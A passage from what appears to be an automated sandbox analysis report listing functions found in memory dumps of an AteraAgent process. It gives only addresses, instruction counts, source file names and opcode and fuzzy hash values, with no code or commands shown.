                                                                                                                                                                                                                                                                                                • Instruction ID: 10823fc8f6a18075d30735e7c59b630a1582133d7725f7da8b0ee3dffc7f94f1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c80e492822324658cfda654cd822bbe0d4e64e5311fadba03b66cf9cbe865d31
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9231C020A0E7C94FD766E77848785613FA1EF9321071B40FFC489CB5E3DA18690AC322
                                                                                                                                                                                                                                                                                                Function 00007FFD9B382E38 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 8abab75db84272ca6b0a76222f61bc0cd99384a25f8526c53fbab447032a0033
                                                                                                                                                                                                                                                                                                • Instruction ID: 87047fba71ad907bebcc98a5b53043890e5abe4dc020a92e3afaf2401434d452
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8abab75db84272ca6b0a76222f61bc0cd99384a25f8526c53fbab447032a0033
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D221A722A0EE8D4FEB61EEEC9C546E97BE0FF65200F0501BED458C61E6DE34AA418745
                                                                                                                                                                                                                                                                                                Function 00007FFD9B5A3781 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 4ad172d4b9b82b08432936dd25c55de0f1d8ce132a5f227be288191ca1f1cbd7
                                                                                                                                                                                                                                                                                                • Instruction ID: 124b71730dc314f951d94d6ee0051b0297198e9698e2d8a49fca1ffaeccdb946
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ad172d4b9b82b08432936dd25c55de0f1d8ce132a5f227be288191ca1f1cbd7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D221FD7170DE4C8FDBD6DB6C98A8A643BE1FF9931471A01EAE04DCB2A2D961AC41C741
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3889A5 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d74377dd02cfc7397ce8dbb4e72ec8d3ed27dc49812f0c8fa5f974621ad85ef3
                                                                                                                                                                                                                                                                                                • Instruction ID: 7f375a6bfca0ff645d8add6fd4521255c5b204c51b91e6e611e431a3b59e08dc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d74377dd02cfc7397ce8dbb4e72ec8d3ed27dc49812f0c8fa5f974621ad85ef3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F21F431D0AA4E8BE7B4EEA494506E8B7B0EF46310F16037DD00CD71E1DB39AA86CB51
                                                                                                                                                                                                                                                                                                Function 00007FFD9B5A2B3D Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ac7f51f3d18183be19eb1e880f7473123b4f13c448f0fff7dfacdea88dd0cd63
                                                                                                                                                                                                                                                                                                • Instruction ID: 2dd24cf2174a0279dadde2445203bbfcc2536f9c5f1b5d1be95ba59c70c485d5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac7f51f3d18183be19eb1e880f7473123b4f13c448f0fff7dfacdea88dd0cd63
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8221F832E0AA9C0FDBA1EBAC44651E87BA1EF6D311B0600BBD508D71E3DE185C01C391
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38425B Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 05308dfd302b5cfc9eb23e4e651e0ef305bc5eadb4d0d3d2e68af2122a80426d
                                                                                                                                                                                                                                                                                                • Instruction ID: 1a752fc8e8236c28fb8cda25a60337f63fbad5cffc8dd37535735461dd7ee062
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05308dfd302b5cfc9eb23e4e651e0ef305bc5eadb4d0d3d2e68af2122a80426d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA216D3188E3C95FD3239BA068225E57F789F03255F1B01EBD088DF8A3C52D569AC762
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38BF1D Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: c2d2dd0cc4efdf2ae7d9775690eaa2469621edaf43433679e21cb4850c4ca021
                                                                                                                                                                                                                                                                                                • Instruction ID: 9f3b2617ea5d84be7646d952e472879a2490eb26da751db04fa8da3ff0cc06c9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2d2dd0cc4efdf2ae7d9775690eaa2469621edaf43433679e21cb4850c4ca021
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2215531A1DF8B4FE7A9EB6884755A17BE0EF5520070901EFC089C7296EE29EC058702
                                                                                                                                                                                                                                                                                                Function 00007FFD9B394BD5 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ad4312aa97e7a0cc2817ab1e7c339f67fe1c9be51491141ec626937f80ee6984
                                                                                                                                                                                                                                                                                                • Instruction ID: 0d975a1b6bcff615a23cb3937d664c4f60e79715fd6cdcd1679ffe49003a8dff
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad4312aa97e7a0cc2817ab1e7c339f67fe1c9be51491141ec626937f80ee6984
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A321B73071DE8D4FE7A9E7A88060A7577E1EF99200B0940FED09EC72A3CE28B945C741
                                                                                                                                                                                                                                                                                                Function 00007FFD9B592FC7 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: a6fcd2e066e808ff90dbeedb07a904fe7c8d9a8414f15cc392682a90ba119122
                                                                                                                                                                                                                                                                                                • Instruction ID: e37eea4b9c9863d3803584bb16b2c3c2595dcb75f32690966906a6fcff6784e2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6fcd2e066e808ff90dbeedb07a904fe7c8d9a8414f15cc392682a90ba119122
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B213E31B1981D8FEFE5EB989464BEC73B1FF58315F45017AD00DE31A2CA29A9418780
                                                                                                                                                                                                                                                                                                Function 00007FFD9B394078 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: dcd5bab19c81fa532f8e1e57364349e503546327053ca297c4dc5d630f9a2cf3
                                                                                                                                                                                                                                                                                                • Instruction ID: ecdc428da83dfcd8910e008ad00fe8db3cce77ee2acc59f2927604621d9e1299
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcd5bab19c81fa532f8e1e57364349e503546327053ca297c4dc5d630f9a2cf3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43112943B1F9990BF365F6AC6CB65F86780EF4572570942BFD08DC32A7EC482D564240
                                                                                                                                                                                                                                                                                                Function 00007FFD9B395E10 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: c5470195aa172e3ec50e0e969b879ae3d9ae6ddda53ead20b5341a36cbbd8e5f
                                                                                                                                                                                                                                                                                                • Instruction ID: fa4cbae59af9f9acc304abdc7d061b652ef65841e9eb1db9c13eb47f5209eb2f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5470195aa172e3ec50e0e969b879ae3d9ae6ddda53ead20b5341a36cbbd8e5f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3110832F0AE0E0FEBE8E15C64646B963C2EBD8265715053FD40DC32A4DD16DC838340
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3960E0 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 28cc9d254398940a593fdb29e878958227254ca50efc94689e2ad61a4663680f
                                                                                                                                                                                                                                                                                                • Instruction ID: 24b6f8a3bc5093250367ad0502f7d988d8064cf74d75e118c190b2a546b66a13
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28cc9d254398940a593fdb29e878958227254ca50efc94689e2ad61a4663680f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E911C232B0FD4D4BE7E5A49E3CA916536C1DB9969174641BFE40CC32B6DC169D418281
                                                                                                                                                                                                                                                                                                Function 00007FFD9B395E99 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 60c1516194fa34742a1b605b115b58f40f7e58894e20bd542caaa373e8d6e02c
                                                                                                                                                                                                                                                                                                • Instruction ID: e1ef4e6070c4fb42b865afca92147be613e01f73da797a639fe78b56cc050fc9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60c1516194fa34742a1b605b115b58f40f7e58894e20bd542caaa373e8d6e02c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70113A32B1EA4D4FE798E76C58646B467C1FF89210B4A417ED84DC36D5DD15A9828340
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3960D8 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 29b9d0befb114456c5623b01ec258793cad160114e3a0cbe70619d3231e2eed2
                                                                                                                                                                                                                                                                                                • Instruction ID: 54222f50f8014366f28a33f800cdf60b2c1a119eaee5c54b2e272bcd2ce575a8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29b9d0befb114456c5623b01ec258793cad160114e3a0cbe70619d3231e2eed2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9611C232B0FD4D4FE7E5E4AD2CB517536C1EB9969174640BEE44CC32B3DC159D058241
                                                                                                                                                                                                                                                                                                Function 00007FFD9B399D98 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: a31a3fd212cb399a8612b0df86d12a93a8b95655ef88bb1dd2283342261f4953
                                                                                                                                                                                                                                                                                                • Instruction ID: 832b86f036530e373edd7f8a78860639b015e40e00fabff2b27fc6ebbf49b1d5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a31a3fd212cb399a8612b0df86d12a93a8b95655ef88bb1dd2283342261f4953
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C711E931A29F4D8BE769EB6884A65B6B3D0FF58701F40053EE48BC3790DE64B9458782
                                                                                                                                                                                                                                                                                                Function 00007FFD9B395312 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ad43bcb2919f35863098ec90b07d03ab46bbda672d60f8356611ef6f24e9fe01
                                                                                                                                                                                                                                                                                                • Instruction ID: 37f07bc4837a1ea7d592fb7a4c1891dc464f6d3cdfbb47dd15c2e25d63e2666c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad43bcb2919f35863098ec90b07d03ab46bbda672d60f8356611ef6f24e9fe01
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64117063B0EF4F8FEBB8EA5CA0A436463D1EBA8390715457ED00EC76A5DE51EC468740
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3A4320 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 221d1d53dbcb228f3cbb73204cd90110227b2ba44ec54dd50f27c451511445ee
                                                                                                                                                                                                                                                                                                • Instruction ID: c31ca16f27ae7b7c7cb5b4c01e6619be042a611456c0d6abbeed0a3b28ce08fa
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 221d1d53dbcb228f3cbb73204cd90110227b2ba44ec54dd50f27c451511445ee
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB11083061DA594FD765F738D4A57A177D1FF04300F1545ADC49EC72D6EA29B886C380
                                                                                                                                                                                                                                                                                                Function 00007FFD9B39966E Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: f640ae5942985397b38889033bd87f57f43bd0376392f43f3b54b7b8b95cde2b
                                                                                                                                                                                                                                                                                                • Instruction ID: 3d498f52eb00a95c7cb9230fdc8eb4d0f9040fa23ac93f7e9acdf39d4e58253d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f640ae5942985397b38889033bd87f57f43bd0376392f43f3b54b7b8b95cde2b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B11B26170E58C8FE7A5EA2C94ADBB977E1EF95311F4506FED04CCB2B2CA34A8058701
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38D965 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 976b67a1a97194020ce77fd20f631d85c5fdc4502300d0509f1437ff8399d4c6
                                                                                                                                                                                                                                                                                                • Instruction ID: aafeab7a277400b2e865f65ec26da098241570a0bfd65547a30dc766205dfe33
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 976b67a1a97194020ce77fd20f631d85c5fdc4502300d0509f1437ff8399d4c6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4113A6150F7C85FD7069BA888659517FE0EF6720070A45EFD088CF1B3C928A989C752
                                                                                                                                                                                                                                                                                                Function 00007FFD9B5A07DA Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 3c236096c30a29bbdfc78d07a1fee1dc2ca40ebf96372616f01274f0e4f41c19
                                                                                                                                                                                                                                                                                                • Instruction ID: 0344d4a42ff5f6598b066c8bdf403665ed4b873b792498ca85a7fbaab98c38bb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c236096c30a29bbdfc78d07a1fee1dc2ca40ebf96372616f01274f0e4f41c19
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39115E31B1DA1E8FEBA9DE8894A15B873A1FB94710F51003AD00ED7297DE25B9538B84
                                                                                                                                                                                                                                                                                                Function 00007FFD9B398403 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 32e763660c803c26ea6177617c3cecf8fa4cf7317dacd4e0e115606545cfc87c
                                                                                                                                                                                                                                                                                                • Instruction ID: c2a4f194eee5044f7a3de732ef2e853b26c7492609bfb74ecb81678942a31d5b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32e763660c803c26ea6177617c3cecf8fa4cf7317dacd4e0e115606545cfc87c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9401863274DD0C8FE7A8FA0CA8959B073C1EFA836035505ABD44DC7662E912EC428741
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38A680 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 84db5037532f80c248a7a741f7d743eebd773ceed59e05fcf836880e59367d6a
                                                                                                                                                                                                                                                                                                • Instruction ID: 4f8220e232d46fa186fbb72bbfadc9848a41e58ccaceb1483c29e8c06368b03a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84db5037532f80c248a7a741f7d743eebd773ceed59e05fcf836880e59367d6a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3018131B19D0D0FE6E4EAECA85477673C5EB98360B41027AE50DC32A6ED69E8418382
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38D33F Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
